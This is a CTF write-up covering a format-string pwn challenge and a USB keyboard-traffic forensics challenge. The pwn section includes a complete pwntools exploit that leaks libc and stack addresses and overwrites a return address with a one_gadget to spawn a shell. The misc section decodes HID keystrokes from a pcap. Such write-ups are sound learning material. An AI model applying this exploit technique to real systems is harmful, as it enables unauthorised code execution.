Preface: I only solved the two sign-in challenges; there are too many strong players, so I won't get into the summer camp this time... ??? what, solving a challenge is enough to get in, but it clashes with other things, so I probably still can't go, sob. To sum up, my knowledge is still not broad enough; I couldn't crack ezhttp no matter what, so I need to keep studying. Writing up the two easy ones I did solve as filler (not really), just for the record.

pwn:

fmt:

Stack-based format string with all protections enabled (I forgot this at first, went off trying to modify the GOT, and wasted a lot of time).

The first format string leaks addresses; the second rewrites the return address to main so that the stack can be laid out and modified afterwards.

Stepping through in gdb shows that at exit the constraints of one of the one_gadgets are satisfied. The GOT is not writable, so the return address is modified instead.


Overwriting main+33 would mean changing 6 bytes, whereas overwriting __libc_start_main+243 only takes 3 bytes, so the latter is chosen. The rest is placing the address of __libc_start_main+243 on the stack, but note that we cannot write too many bytes in one go, so the three bytes have to be written separately. Script below (it was written a bit messily at the time):

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./fmt')
libc=ELF('libc-2.31.so')
elf=ELF('./fmt')
#p=remote('60.204.140.184',30160)

payload1=b'%10$p-%19$p-%14$p' # leak addresses: libc, main, stack
p.sendlineafter(b'I need a str: ',payload1)
libc_base=int(p.recv(14),16)-2020800
success('libc_base:'+hex(libc_base))
p.recvuntil(b'-')
main_addr=int(p.recv(14),16)
main=main_addr-28+5
elf_base=main-0x13c6
success('main:'+hex(main))
p.recvuntil(b'-')
stack_addr=int(p.recv(14),16)+8
stack=stack_addr+0x10
success('stack_addr:'+hex(stack_addr))
one1=libc_base+0xe3afe
one2=libc_base+0xe3b01 # the one_gadget whose constraints are satisfied
one3=libc_base+0xe3b04
success('one1:'+hex(one1))
success('one2:'+hex(one2))
success('one3:'+hex(one3))

# overwrite the return address so we get another format string
main1=main%0x100
success('main1:'+hex(main1))
payload2=b'%'+str(main1).encode()+b'c%10$hhn'
payload2=payload2.ljust(0x20,b'\x00')+p64(stack_addr)
#gdb.attach(p)
#pause()
p.sendlineafter(b'I need other str: ',payload2)

# the three bytes, low to high (sometimes o2 is larger than o3)
o1=one2%0x100
o2=(one2>>16)%0x100
o3=(one2>>8)%0x100

# lay out the stack
stack1=stack+2
stack2=stack+1
# format string overwrites __libc_start_main+243
payload3=b'%'+str(o1).encode()+b'c%11$hhn'+b'%'+str(o2-o1).encode()+b'c%12$hhn'+b'%'+str(o3-o2).encode()+b'c%13$hhn'
payload3=payload3.ljust(0x28,b'\x00')+p64(stack)+p64(stack1)+p64(stack2)
#gdb.attach(p)
#pause()
p.sendlineafter(b'str: ',payload3)
#gdb.attach(p)
#pause()
p.sendline(b'')

p.interactive()


misc

usb:

The data is 8 bytes per packet, so this is keyboard traffic in HID DATA format. Extract it first:

tshark -r misc1.pcapng -T fields -e usbhid.data | sed '/^\s*$/d' > usbdata.txt

Then grab a fairly complete script from the web and run it to see what the data is:

'''
BYTE1 --
|--bit0: Left Control pressed (1 = pressed)
|--bit1: Left Shift pressed (1 = pressed)
|--bit2: Left Alt pressed (1 = pressed)
|--bit3: Left GUI pressed (1 = pressed)
|--bit4: Right Control pressed (1 = pressed)
|--bit5: Right Shift pressed (1 = pressed)
|--bit6: Right Alt pressed (1 = pressed)
|--bit7: Right GUI pressed (1 = pressed)
BYTE2 -- unclear; some sources say it is a reserved byte
BYTE3--BYTE8 -- these six are ordinary keys
from: https://blog.csdn.net/fjh1997/article/details/105841367
'''
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
                    help="name of the input file in the same directory")
args = parser.parse_args()

FILE_PATH = os.path.abspath(args.f)


normalKeys = {
"04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
"09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
"0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
"13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
"18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
"1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
"22":"5", "23":"6","24":"7","25":"8","26":"9",
"27":"0", "28":"<RET>", "29":"<ESC>", "2a":"<DEL>", "2b":"<ALT>",
"2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
"32":"<NON>", "33":";","34":"'", "35":"<GA>", "36":",", "37":".",
"38":"/", "39":"<CAP>", "3a":"<F1>", "3b":"<F2>", "3c":"<F3>", "3d":"<F4>",
"3e":"<F5>", "3f":"<F6>", "40":"<F7>", "41":"<F8>", "42":"<F9>", "43":"<F10>",
"44":"<F11>", "45":"<F12>", "4a":"<HOME>", "4c":"<DELETE>", "4d":"<END>", "4f":"<RightArrow>",
"50":"<LeftArrow>", "51":"<DownArrow>", "52": "<UpArrow>", "53":"<NumLock>", "54":"/",
"55":"*", "56":"-", "57":"+", "58":"<RET>", "59":"1", "5a":"2", "5b":"3", "5c":"4", "5d":"5",
"5e":"6", "5f":"7", "60":"8", "61":"9", "62":"0"}
shiftKeys = {
"04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
"09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
"0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
"13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
"18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
"1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
"22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
"28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<ALT>","2c":"<SPACE>",
"2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":":",
"34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
"3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
"41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>",
"4a":"<HOME>", "4c":"<DELETE>", "4d":"<END>", "4f":"<RightArrow>",
"50":"<LeftArrow>", "51":"<DownArrow>", "52": "<UpArrow>", "53":"<NumLock>", "54":"/",
"55":"*", "56":"-", "57":"+", "58":"<RET>", "59":"1", "5a":"2", "5b":"3", "5c":"4", "5d":"5",
"5e":"6", "5f":"7", "60":"8", "61":"9", "62":"0"}

if FILE_PATH.endswith(".txt"):
    # one usbhid.data value per line, as produced by the tshark command above
    with open(FILE_PATH, "r") as f:
        data = f.read().splitlines()
else:
    # 'tools' is the original script's helper module for reading a pcap directly;
    # it is not part of this post, so it is only imported when actually needed
    import tools
    data = tools.get_data(FILE_PATH)

def get_info(original=False):
    output = []
    for line in data:
        # byte 3 (chars 4:6) is the first key slot; 00 means no key pressed
        if line[4:6] == "00":
            continue

        # 2a is Backspace: drop the previous character unless raw output was requested
        if not original and line[4:6] == "2a":
            output = output[:-1]
            continue

        if line[4:6] in normalKeys:
            modifiers = int(line[:2], 16)
            shifted = bool(modifiers & 0x22)  # bit1 = Left Shift, bit5 = Right Shift
            output.append(shiftKeys[line[4:6]] if shifted else normalKeys[line[4:6]])
    return output

data = get_info(True)
print(f"raw data: {''.join(data)}")

flag = []
for i in data:
    if i == "<SPACE>":
        flag.append(" ")
    elif i == "<ALT>":
        flag.append("\t")
    elif i == "<CAP>":
        flag.append("")
    elif i == "<RET>":
        flag.append("\n")
    elif i == "<DEL>":
        if flag != []:
            flag.pop(-1)
    else:
        flag.append(i)
print(f"cleaned data: {''.join(flag)}")
os.system("pause")  # Windows only: keeps the console window open

This gives: Ao(mgHy<DEL>Y$<CAP>a@q7<CAP>gW2D$dE@6#oO0f<Gm1hAI'/N#4C<DEL><AN;<CAP>ms@p<CAP>frQ149K<DELETE>

Then I had to fix it up by hand according to those key names, applying the delete key and the caps-lock key changes (one reason I knew it needed fixing is that dropping it into CyberChef produced a "flag{", but everything after that was garbage).

After the fixes: Ao(mgHY$\A@Q7gW2D$dE@6#oO0f<Gm1hAI'/N#4<AN;MS@PfrQ149K

Run it through Base85 in CyberChef and the flag comes out.
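The manual clean-up above (undoing <DEL>, toggling case for <CAP>) is exactly what the downloaded script leaves to the reader, and that script also counts a held key once per report. As an added example, not from the post or the script it borrows, here is a decoder that does that bookkeeping itself: it accepts both the plain and the colon-separated hex forms tshark emits, tracks Caps Lock state (Shift and Caps Lock cancel each other for letters), applies Backspace, and only acts on key-down edges so a key held across several reports is emitted once. The key table is the standard USB HID usage table for a US boot-protocol keyboard; the sample reports are constructed for this example and are not the challenge capture.

```python
# USB HID boot-protocol keyboard: byte 0 = modifiers, byte 1 = reserved, bytes 2..7 = keys.
UNSHIFTED, SHIFTED = {}, {}
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):       # usage IDs 0x04..0x1d
    UNSHIFTED[0x04 + i], SHIFTED[0x04 + i] = ch, ch.upper()
for i, (ch, sh) in enumerate(zip("1234567890", "!@#$%^&*()")):  # usage IDs 0x1e..0x27
    UNSHIFTED[0x1e + i], SHIFTED[0x1e + i] = ch, sh
for code, (plain, sh) in {0x2c: (" ", " "), 0x2d: ("-", "_"), 0x2e: ("=", "+"),
                          0x2f: ("[", "{"), 0x30: ("]", "}"), 0x31: ("\\", "|"),
                          0x33: (";", ":"), 0x34: ("'", '"'), 0x36: (",", "<"),
                          0x37: (".", ">"), 0x38: ("/", "?")}.items():
    UNSHIFTED[code], SHIFTED[code] = plain, sh
ENTER, BACKSPACE, CAPSLOCK = 0x28, 0x2a, 0x39
SHIFT_MASK = 0x22  # modifier byte: bit1 = Left Shift, bit5 = Right Shift

def parse_report(line):
    """Turn one tshark usbhid.data value ('0000040000000000' or the
    colon-separated '00:00:04:...' form) into (modifier byte, pressed usage IDs)."""
    raw = bytes.fromhex(line.strip().replace(":", ""))
    if len(raw) != 8:
        raise ValueError(f"expected an 8-byte boot keyboard report, got {len(raw)} bytes")
    return raw[0], [k for k in raw[2:8] if k]

def decode_reports(lines):
    """Reconstruct typed text from a sequence of keyboard reports.
    Tracks Caps Lock, applies Backspace, and only acts on key-down edges
    so a key that stays down across several reports is not repeated."""
    text, caps, held = [], False, set()
    for line in lines:
        if not line.strip():
            continue
        mods, keys = parse_report(line)
        shift = bool(mods & SHIFT_MASK)
        for k in keys:
            if k in held:            # still down from the previous report
                continue
            if k == CAPSLOCK:
                caps = not caps
            elif k == BACKSPACE:
                if text:
                    text.pop()
            elif k == ENTER:
                text.append("\n")
            elif k in UNSHIFTED:
                # Caps Lock only affects letters, and Shift inverts it
                upper = (shift != caps) if UNSHIFTED[k].isalpha() else shift
                text.append(SHIFTED[k] if upper else UNSHIFTED[k])
        held = set(keys)
    return "".join(text)

# Constructed sample (not the challenge capture): "flag{", Caps Lock on, 'T' held
# across two reports, Backspace, Caps Lock off, "st", Shift+']'.
SAMPLE_REPORTS = [
    "0000090000000000", "0000000000000000",              # f
    "00:00:0f:00:00:00:00:00", "0000000000000000",       # l (colon form)
    "0000040000000000", "0000000000000000",              # a
    "00000a0000000000", "0000000000000000",              # g
    "02002f0000000000", "0000000000000000",              # Shift+[  -> {
    "0000390000000000", "0000000000000000",              # Caps Lock on
    "0000170000000000", "0000170000000000",              # T, still held
    "0000000000000000",
    "00002a0000000000", "0000000000000000",              # Backspace
    "0000390000000000", "0000000000000000",              # Caps Lock off
    "0000160000000000", "0000000000000000",              # s
    "0000170000000000", "0000000000000000",              # t
    "0200300000000000", "0000000000000000",              # Shift+]  -> }
]

if __name__ == "__main__":
    print(decode_reports(SAMPLE_REPORTS))
```

To use it on the challenge data, read usbdata.txt with `decode_reports(open("usbdata.txt").read().splitlines())`; the key tokens the downloaded script prints as <CAP> and <DEL> never appear in the output because they have already been applied.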
